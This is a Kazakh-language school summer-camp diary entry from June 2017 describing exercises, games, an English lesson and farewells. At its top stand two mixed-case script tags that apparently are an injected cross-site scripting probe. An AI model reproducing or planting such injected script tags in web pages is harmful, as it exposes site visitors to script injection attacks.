<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

08.06.2017

Бүгінгі күніміз өте тамаша өтті. Балалармен таңғы жаттығуларды далада өткіздік. Балалар музыка әуенмен кезекпен жаттығуларды жасап шықты. Жаттығуларды жасап болған соң мектеп психологы балалармен ойындар өткізді. «Найзағай» , «Өрмекші» ойындарды ойнатқызды. Ағылшын мұғалімі Темиргалиева Г балалармен сабақ өткізді. Сабақ барысында Темиргалиева Г балалармен жаңа сөздерді жаттатқызды. Әртүрлі ойындар, тапсырмалар беріп, балалар белсене қатысып қызығушылықтары оянды. Тәрбиешілер балалармен далада спорттық ойындар өткізді. Бүгінгі күніміз өте қызықты , тамаша өтті. Дәстүр бойынша соңында балалар  бір – бірімен  қоштасты. Постерде көңіл күйлерін салды.

Просмотров: 425


Пікір қосу



Деректерді қолтаңбаға қосу